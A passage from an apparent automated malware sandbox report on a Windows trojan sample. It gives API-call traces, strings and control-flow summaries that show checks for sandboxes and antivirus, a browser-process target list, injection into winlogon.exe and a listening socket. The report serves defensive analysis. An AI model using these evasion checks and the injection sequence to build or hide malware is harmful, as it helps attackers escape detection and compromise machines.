                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C83C6D
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C83C83
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C83C94
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • POST, xrefs: 02C83ABD, 02C83AD3
                                                                                                                                                                                                                    • GET, xrefs: 02C83AB6
                                                                                                                                                                                                                    • Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02C83A79
                                                                                                                                                                                                                    • Content-Type: multipart/form-data; boundary=---------------------------%s, xrefs: 02C83B27
                                                                                                                                                                                                                    • Content-Type: application/x-www-form-urlencoded, xrefs: 02C83B05
                                                                                                                                                                                                                    • Referer: http://www.google.com, xrefs: 02C83B14
                                                                                                                                                                                                                    • HTTP/1.0, xrefs: 02C83ACD
                                                                                                                                                                                                                    • 6b8e26743fcf62a2, xrefs: 02C83B22
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Http$ProcessRequest$FileHeadersInternet$FreeHandleOpenValidatememset$AllocateCloseConnectCreateInfoInformationQueryReadSendWrite_snprintf
                                                                                                                                                                                                                    • String ID: 6b8e26743fcf62a2$Content-Type: application/x-www-form-urlencoded$Content-Type: multipart/form-data; boundary=---------------------------%s$GET$HTTP/1.0$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$POST$Referer: http://www.google.com

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Graph for the function starting at 02C73940 (legend: Executed / Not Executed); graph image not preserved.
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C739EC
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C73A17
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C73A3E
                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004,?), ref: 02C73A9F
                                                                                                                                                                                                                    • SymSetOptions.DBGHELP(00000006), ref: 02C73AB4
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000001), ref: 02C73AC4
                                                                                                                                                                                                                    • SymInitialize.DBGHELP(00000000), ref: 02C73AC7
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000), ref: 02C73B05
                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,main,00000000,?), ref: 02C73B90
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C73BAE
                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 02C73C44
                                                                                                                                                                                                                    • ZwQueryInformationThread.NTDLL(00000000), ref: 02C73C4B
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?), ref: 02C73C88
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • ExceptionAddress = , xrefs: 02C73AD4
                                                                                                                                                                                                                    • scr.bmp, xrefs: 02C73F58
                                                                                                                                                                                                                    • ExceptionCode = 0x%08XLast error: 0x%08XContext:Eip = 0x%08X Eax = 0x%08X Ebx = 0x%08XEcx = 0x%08X Edx = 0x%08X Ebp = 0x%08XEsp = 0x%08X Esi = 0x%08X Edi = 0x%08XEFlags = 0x%08XMain module:%s 0x%08X-0x%08X, xrefs: 02C73BA7
                                                                                                                                                                                                                    • DEBUG, xrefs: 02C73FAD
                                                                                                                                                                                                                    • csm, xrefs: 02C73965
                                                                                                                                                                                                                    • main, xrefs: 02C73B57
                                                                                                                                                                                                                    • Self exception = TRUE, xrefs: 02C73BF8
                                                                                                                                                                                                                    • CallStack:, xrefs: 02C73CBD
                                                                                                                                                                                                                    • HH;mm;ss, xrefs: 02C73E12
                                                                                                                                                                                                                    • sysinfo.log, xrefs: 02C73ED8
                                                                                                                                                                                                                    • debug_%s_%s.log, xrefs: 02C73E34
                                                                                                                                                                                                                    • dd;MMM;yyyy, xrefs: 02C73DED
                                                                                                                                                                                                                    • ThreadStart = , xrefs: 02C73C60
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CurrentQueryVirtual$Process$Thread$AllocErrorInformationInitializeLastOptions_snprintf
                                                                                                                                                                                                                    • String ID: CallStack:$ExceptionCode = 0x%08XLast error: 0x%08XContext:Eip = 0x%08X Eax = 0x%08X Ebx = 0x%08XEcx = 0x%08X Edx = 0x%08X Ebp = 0x%08XEsp = 0x%08X Esi = 0x%08X Edi = 0x%08XEFlags = 0x%08XMain module:%s 0x%08X-0x%08X$Self exception = TRUE$ThreadStart = $DEBUG$ExceptionAddress = $HH;mm;ss$csm$dd;MMM;yyyy$debug_%s_%s.log$main$scr.bmp$sysinfo.log

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Graph for the function starting at 00402C10 (legend: Executed / Not Executed); graph image not preserved.
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(user32.dll), ref: 00402C21
                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402C35
                                                                                                                                                                                                                      • Part of subcall function 00403900: RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403940
                                                                                                                                                                                                                      • Part of subcall function 00403900: RegQueryValueExA.KERNEL32(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403965
                                                                                                                                                                                                                      • Part of subcall function 00403900: RegCloseKey.ADVAPI32(?), ref: 00403973
                                                                                                                                                                                                                      • Part of subcall function 00403900: GetUserNameA.ADVAPI32(?,00000104), ref: 004039B9
                                                                                                                                                                                                                      • Part of subcall function 00403900: CharUpperA.USER32(?), ref: 004039C6
                                                                                                                                                                                                                      • Part of subcall function 00403900: strstr.MSVCRT ref: 004039DE
                                                                                                                                                                                                                      • Part of subcall function 00403900: strstr.MSVCRT ref: 004039F7
                                                                                                                                                                                                                      • Part of subcall function 00403900: strstr.MSVCRT ref: 00403A10
                                                                                                                                                                                                                      • Part of subcall function 00403900: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403A29
                                                                                                                                                                                                                      • Part of subcall function 00403900: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403A4D
                                                                                                                                                                                                                      • Part of subcall function 00403900: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403A87
                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00402C46
                                                                                                                                                                                                                    • FindWindowA.USER32(____AVP.Root,00000000), ref: 00402C5D
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00402C69
                                                                                                                                                                                                                    • PostMessageA.USER32(00000000,00000466,00010001,00000000), ref: 00402C7B
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 00402C9B
                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00402CAC
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3402365018.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3402365018.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Namestrstr$ExitFileModuleProcessUser$AdminCharCloseCountDirectoryFindInformationLibraryLoadMessageOpenPostQuerySystemTickUpperValueVolumeWindowWindows
                                                                                                                                                                                                                    • String ID: Fri Jun 17 05:52:09 20112$IsWow64Process$Pn7w$\apppatch\$____AVP.Root$explorer.exe$kernel32.dll$user32.dll$winlogon.exe

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    control_flow_graph 966 403900-403948 RegOpenKeyExA 967 40394a-40396d RegQueryValueExA 966->967 968 4039ad-4039e5 GetUserNameA CharUpperA strstr 966->968 971 40397b-40398c RegCloseKey 967->971 972 40396f-403979 RegCloseKey 967->972 969 403acb 968->969 970 4039eb-4039fe strstr 968->970 974 403acc-403ad2 969->974 970->969 973 403a04-403a17 strstr 970->973 971->968 975 40398e-403995 971->975 972->968 973->969 976 403a1d-403a5b GetSystemWindowsDirectoryA GetVolumeInformationA 973->976 975->968 977 403997-40399e 975->977 976->969 978 403a5d-403a62 976->978 977->968 979 4039a0-4039a7 977->979 978->969 980 403a64-403a69 978->980 979->968 979->974 980->969 981 403a6b-403a70 980->981 981->969 982 403a72-403a77 981->982 982->969 983 403a79-403aa3 GetModuleFileNameA StrStrIA 982->983 983->969 984 403aa5-403ab5 StrStrIA 983->984 984->969 985 403ab7-403ac7 StrStrIA 984->985 985->969 986 403ac9 985->986 986->969
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403940
                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403965
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00403973
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040397F
                                                                                                                                                                                                                    • GetUserNameA.ADVAPI32(?,00000104), ref: 004039B9
                                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 004039C6
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 004039DE
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 004039F7
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 00403A10
                                                                                                                                                                                                                    • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403A29
                                                                                                                                                                                                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403A4D
                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403A87
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\sand-box\), ref: 00403A9F
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\cwsandbox\), ref: 00403AB1
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\sandbox\), ref: 00403AC3
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3402365018.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3402365018.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: strstr$CloseName$CharDirectoryFileInformationModuleOpenQuerySystemUpperUserValueVolumeWindows
                                                                                                                                                                                                                    • String ID: E$HARDWARE\DESCRIPTION\System$M$MALNETVM$Q$SANDBOX$SystemBiosVersion$U$VIRUSCLONE$\cwsandbox\$\sand-box\$\sandbox\

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    control_flow_graph 1018 2c888f0-2c8896a WSAStartup 1019 2c8896c-2c8896e ExitThread 1018->1019 1020 2c88974-2c88989 socket 1018->1020 1021 2c8898b-2c8898d ExitThread 1020->1021 1022 2c88993-2c889cd htons * 2 bind 1020->1022 1023 2c889cf-2c889d1 ExitThread 1022->1023 1024 2c889d7-2c889ea listen 1022->1024 1025 2c889ec-2c889ee ExitThread 1024->1025 1026 2c889f4-2c88a03 gethostname 1024->1026 1027 2c88a7b-2c88a93 accept 1026->1027 1028 2c88a05-2c88a14 gethostbyname 1026->1028 1029 2c88af4-2c88af6 ExitThread 1027->1029 1030 2c88a95-2c88aa9 getpeername 1027->1030 1028->1027 1031 2c88a16-2c88a1c 1028->1031 1033 2c88aab-2c88abb inet_ntoa htons 1030->1033 1034 2c88ac1-2c88ad7 CreateThread 1030->1034 1031->1027 1032 2c88a1e-2c88a22 1031->1032 1035 2c88a26-2c88a75 inet_ntoa 1032->1035 1033->1034 1036 2c88ad9-2c88af2 CloseHandle accept 1034->1036 1037 2c88afc-2c88b05 closesocket ExitThread 1034->1037 1035->1035 1038 2c88a77 1035->1038 1036->1029 1036->1030 1038->1027
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExitThread$Startupsocket
                                                                                                                                                                                                                    • String ID: login$pass
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 02C86370: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 02C86384
                                                                                                                                                                                                                      • Part of subcall function 02C86370: Process32First.KERNEL32(00000000,?), ref: 02C863A9
                                                                                                                                                                                                                      • Part of subcall function 02C86370: GetCurrentProcessId.KERNEL32(?,00000000), ref: 02C863CD
                                                                                                                                                                                                                      • Part of subcall function 02C86370: StrStrIA.SHLWAPI(iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|,?,?,00000000), ref: 02C863E7
                                                                                                                                                                                                                      • Part of subcall function 02C86370: EnterCriticalSection.KERNEL32(02CBD8A0,?,00000000), ref: 02C8640B
                                                                                                                                                                                                                      • Part of subcall function 02C86370: GetProcessHeap.KERNEL32(00000008,00000010,?,00000000), ref: 02C86411
                                                                                                                                                                                                                      • Part of subcall function 02C86370: HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02C86418
                                                                                                                                                                                                                      • Part of subcall function 02C86370: LeaveCriticalSection.KERNEL32(02CBD8A0,?,00000000), ref: 02C86446
                                                                                                                                                                                                                      • Part of subcall function 02C86370: Process32Next.KERNEL32(00000000,00000128), ref: 02C8645A
                                                                                                                                                                                                                      • Part of subcall function 02C86370: GetHandleInformation.KERNEL32(00000000,?,?,00000000), ref: 02C86474
                                                                                                                                                                                                                      • Part of subcall function 02C86370: CloseHandle.KERNEL32(00000000,?,00000000), ref: 02C86485
                                                                                                                                                                                                                    • OpenProcess.KERNEL32 ref: 02C86510
                                                                                                                                                                                                                    • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 02C86534
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C86558
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8656A
                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(02CBD8A0), ref: 02C86575
                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(02CBD8A0), ref: 02C86594
                                                                                                                                                                                                                    • OpenProcess.KERNEL32(?,00001400,?), ref: 02C86610
                                                                                                                                                                                                                    • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 02C86631
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,FFFFFFFF), ref: 02C86655
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C86667
                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(02CBD8A0), ref: 02C86672
                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(02CBD8A0), ref: 02C86698
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C866E6
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C86731
                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(02CBD8A0,?,?), ref: 02C86770
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000010), ref: 02C8677A
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C86781
                                                                                                                                                                                                                    • OpenProcess.KERNEL32(?,00001400,?), ref: 02C867D0
                                                                                                                                                                                                                    • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 02C867F3
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(?,00001400), ref: 02C8681B
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 02C8682D
                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(02CBD8A0), ref: 02C8684D
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C8687A
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C86881
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C8688D
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C86894
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000032), ref: 02C868A0
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Process$CriticalHandleHeapSection$CloseEnterInformationLeave$OpenTimes$AllocProcess32QueryVirtual$CreateCurrentFirstFreeNextSleepSnapshotToolhelp32Validate
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1045582906-0
                                                                                                                                                                                                                    • Opcode ID: b5554ce6a6e97e970ca9dc0c4d7c248bb66e36c801cb0225fb34d715afcd3c88
                                                                                                                                                                                                                    • Instruction ID: c6614f8cda1026375bc89473445eaafcaf29e54397b90c84eaf1897da800079e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b5554ce6a6e97e970ca9dc0c4d7c248bb66e36c801cb0225fb34d715afcd3c88
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83C1E5B0948391AFD321DF65C884A5AFBE8BFC8B14F208A5EF59A87240D770D545CF92
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,02C92BB9,75AF5CE0), ref: 02C7670B
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C76712
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C7672A
                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 02C76739
                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 02C76761
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$AllocFileFindFirstProcesslstrcpynmemset
                                                                                                                                                                                                                    • String ID: \*.*
                                                                                                                                                                                                                    • API String ID: 2617121151-1173974218
                                                                                                                                                                                                                    • Opcode ID: d435bc3dfd38f8d086b800915070b61be572d68d174d0da329d797efcc14bdd8
                                                                                                                                                                                                                    • Instruction ID: 7becebad95b7428ba07262907e1d3278c4549d4a02366af0e28626690a94c87c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d435bc3dfd38f8d086b800915070b61be572d68d174d0da329d797efcc14bdd8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00616A71E447865BC7224F309C98BA77FADEF81754F244A54F9819B282DB31D60CC791
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00401C70: memset.MSVCRT ref: 00401C96
                                                                                                                                                                                                                      • Part of subcall function 00401C70: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,76230F00,00000000,00000000), ref: 00401CA7
                                                                                                                                                                                                                      • Part of subcall function 00401C70: GetLastError.KERNEL32 ref: 00401CB0
                                                                                                                                                                                                                      • Part of subcall function 00401C70: SwitchToThread.KERNEL32 ref: 00401CBF
                                                                                                                                                                                                                      • Part of subcall function 00401C70: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401CC8
                                                                                                                                                                                                                      • Part of subcall function 00401C70: GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401CE8
                                                                                                                                                                                                                      • Part of subcall function 00401C70: CloseHandle.KERNEL32(00000000), ref: 00401CF9
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064,00000000,?,76D6DB30,00402E38,winlogon.exe), ref: 004015AD
                                                                                                                                                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,00000000,?,76D6DB30,00402E38,winlogon.exe), ref: 004015CC
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004015EB
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401601
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000), ref: 0040160D
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401628
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401638
                                                                                                                                                                                                                    • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 0040167F
                                                                                                                                                                                                                    • WriteProcessMemory.KERNEL32(00000000,00000000,00406400,?,?), ref: 004016A1
                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 004016CD
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?), ref: 004016E8
                                                                                                                                                                                                                    • WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 00401703
                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00401711
                                                                                                                                                                                                                    • WriteProcessMemory.KERNEL32(00000000,?,00406400,00050200,?), ref: 00401744
                                                                                                                                                                                                                    • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 00401754
                                                                                                                                                                                                                    • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00401766
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000), ref: 0040177E
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040178F
                                                                                                                                                                                                                    • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004017B0
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000), ref: 004017CC
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004017DD
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3402365018.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3402365018.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$Process$Create$CloseInformationMemoryThreadVirtualWrite$AddressAllocModuleProcSnapshotToolhelp32$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                                    • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                                    • API String ID: 3542510048-3024904723
                                                                                                                                                                                                                    • Opcode ID: 9e2c1cff1cdf4c28cbaf7383b6b48f0421d485e879072eb787a5153b6e1db307
                                                                                                                                                                                                                    • Instruction ID: c9964d6c084eb6c4e09adf0a78a82ba29cca963801df753bbce45d31a4150425
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e2c1cff1cdf4c28cbaf7383b6b48f0421d485e879072eb787a5153b6e1db307
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5571A3B1600315ABE710DFA4DD89F6F77B8AF84B04F144029FA05B72D1E7B8994587AC
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 02C93B50: memset.MSVCRT ref: 02C93B76
                                                                                                                                                                                                                      • Part of subcall function 02C93B50: CreateToolhelp32Snapshot.KERNEL32(00000008,?,?,00000000,76230F00), ref: 02C93B87
                                                                                                                                                                                                                      • Part of subcall function 02C93B50: GetLastError.KERNEL32 ref: 02C93B90
                                                                                                                                                                                                                      • Part of subcall function 02C93B50: SwitchToThread.KERNEL32 ref: 02C93B9F
                                                                                                                                                                                                                      • Part of subcall function 02C93B50: CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02C93BA8
                                                                                                                                                                                                                      • Part of subcall function 02C93B50: GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C93BC8
                                                                                                                                                                                                                      • Part of subcall function 02C93B50: CloseHandle.KERNEL32(00000000), ref: 02C93BD9
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064,00000000,00000000,?,?), ref: 02C9327F
                                                                                                                                                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,00000000,?,?), ref: 02C9329E
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02C932BD
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02C932D3
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000), ref: 02C932DF
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02C932FA
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02C9330A
                                                                                                                                                                                                                    • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 02C93344
                                                                                                                                                                                                                    • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,?), ref: 02C93365
                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02C93391
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?,?,00003000,00000004), ref: 02C933A9
                                                                                                                                                                                                                    • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000000,00000004,?,?,00003000,00000004), ref: 02C933C4
                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,00003000,00000004), ref: 02C933D2
                                                                                                                                                                                                                    • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 02C933FA
